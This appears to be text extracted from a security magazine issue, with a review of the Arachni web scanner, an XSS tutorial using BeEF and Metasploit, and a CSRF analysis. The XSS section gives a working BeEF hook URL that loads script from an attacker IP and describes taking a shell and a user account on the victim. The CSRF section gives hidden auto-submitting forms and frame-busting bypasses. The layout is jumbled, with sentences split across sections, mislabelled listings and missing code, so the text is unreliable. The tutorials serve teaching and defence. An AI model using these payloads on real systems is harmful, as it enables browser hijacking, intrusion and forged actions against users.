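The test-first idea behind the BDD approach can be sketched without any framework at all (real projects would use rspec/cucumber, as the article says); the render functions below are hypothetical stand-ins:

```ruby
require "cgi"

# Framework-free sketch of the BDD idea: the "specification" is written
# first, then the code is corrected until it passes.

def sanitized?(output)
  !output.include?("<script") # crude check standing in for a real matcher
end

# The spec: malformed input must never be echoed back unescaped.
def passes_filtering_policy?(render)
  payload = "<script>alert(1)</script>"
  sanitized?(render.call(payload))
end

# A first implementation fails the spec...
NAIVE_RENDER = ->(input) { "You searched for: #{input}" }

# ...so the developer fixes it until the spec passes.
FIXED_RENDER = ->(input) { "You searched for: #{CGI.escapeHTML(input)}" }
```

The failing spec, not a report paragraph, is what tells the developer exactly what "implement a filtering policy" means for their code.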
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke during a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practicing the Tae kwon-do ITF martial art. He's a husband, a daddy and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools for the job at hand. Is Arachni worthwhile?
Time for an in-depth review
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view.
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni
Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
We can vouch that both simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.

Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.

The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.

The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.

At the start of every scan a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler will always be run at the start of the scan. This crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.

The HTML parser can extract forms, links, cookies and headers. It can gracefully handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.

Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of audit modules and reconnaissance (recon) modules; Table 1 provides an overview.

Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization and the Metareport, providing Metasploit integration for automated and assisted exploitation.

Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.

Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).

This is great if you want to speed up the scan, or if you want to execute some crazy things like running
Table 2: Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy – analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form-based AutoLogin – performs an automated login
• Dictionary attacker – performs dictionary attacks against HTTP authentication and form-based authentication
• Profiler – performs taint analysis with benign inputs and response time analysis
• Cookie collector – keeps track of cookies while establishing a timeline of the changes
• Healthmap – generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types – logs the content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector – establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules – loads and runs high-level meta-analysis modules pre-/mid-/post-scan:
  • AutoThrottle – dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  • TimeoutNotice – provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  • Uniformity – reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as providing a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the following commands (Listing 1).
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note: these are the same commands as with the Linux installation) (Listing 2).
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command line.
The GUI can be started by executing the following commands
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.
Figure 1. Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of what issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and enable you to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, and more.
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, and so on.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command line and the GUI. First the command line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
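To make the include/exclude behaviour concrete, here is a small Ruby sketch (illustrative only; the `select_modules` helper and its glob semantics are my own invention, not Arachni's actual implementation):

```ruby
# Hypothetical sketch of a --mods style filter: patterns are globs,
# and a leading '-' turns a pattern into an exclusion.
def select_modules( all, patterns )
  selected = []
  patterns.each do |pat|
    if pat.start_with?( '-' )
      # drop previously selected modules matching the exclusion pattern
      selected.reject! { |m| File.fnmatch( pat[1..-1], m ) }
    else
      # add every module matching the inclusion pattern
      selected |= all.select { |m| File.fnmatch( pat, m ) }
    end
  end
  selected
end

mods = %w( xss_path xss_uri sqli csrf )
select_modules( mods, %w( * -xss_* ) )  # => ["sqli", "csrf"]
```

Patterns are applied left to right, so `*,-xss_*` first selects everything and then strips the XSS modules, mirroring the command above.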
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' => 'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' => 'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually. Check if
                    unauthorized interfaces are exposed, or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree. You'll find the modules directory; in there you'll find two directories, audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it real easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needs to be protected and you forget about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) as well as creating a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, are now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:
• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports, it's sufficient to just show a small alert popup; this shows that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this:
HTML Page
<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF & Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1. User enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane, then click on Standard Modules – Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So as you can see, because of BeEF, even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text input, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine rather than being displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF – Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The "jobs" command
Figure 10. Metasploit after clicking "Send Now"
Figure 11. Meterpreter window – screenshot 1
Figure 12. Meterpreter window – screenshot 2
Now first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port-scan an entire internal network, or search for vulnerabilities in other services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window – screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
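As a minimal sketch of the encoding step above (shown here in Ruby; the helper name is illustrative, the article's own examples use PHP), CGI.escapeHTML turns the characters an XSS payload relies on into inert HTML entities:

```ruby
require 'cgi'

# Illustrative helper: encode user input *before* it is reflected in a page.
def render_search_result( user_input )
  "The parameter passed is: #{CGI.escapeHTML( user_input )}"
end

puts render_search_result( '<script>alert(document.domain)</script>' )
# The tag reaches the browser as &lt;script&gt;... and is displayed, not executed.
```

The same call applied to the article's earlier payload, alert(document.domain), would render it as harmless text instead of running it.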
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering. Email: arvinddoraiswamy@gmail.com. LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39b21332. Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com" style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
Referrer checking: some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from a CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website, using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com" >
<input type="submit" >
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)
And here is the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4).
index.php (Evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best way to achieve web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
web page form's hidden field and in a session at the same time, to compare them after the form is submitted.
Subverting one-time tokens is usually attempted with brute-force attacks. Brute forcing one-time tokens is worthwhile only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
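The same store-then-compare scheme can be sketched in Ruby (the helper names are illustrative, not from the article; SecureRandom replaces the md5(uniqid(rand())) construction, which is far easier to guess):

```ruby
require 'securerandom'

# Generate a fresh token, store it server-side in the session, and
# (in a real app) embed the same value in the form's hidden field.
def new_token( session )
  session[:token] = SecureRandom.hex( 16 )
end

# On POST: honour the request only when the submitted token matches
# the one stored in the session.
def token_valid?( session, submitted )
  !session[:token].nil? && session[:token] == submitted
end

session = {}
hidden_field = new_token( session )       # value for <input type="hidden">
token_valid?( session, hidden_field )     # => true
token_valid?( session, 'guessed-token' )  # => false
```

An attacker who cannot read the victim's page (thanks to the same origin policy discussed below) has no way to learn the hidden-field value, so the forged POST fails the comparison.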
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
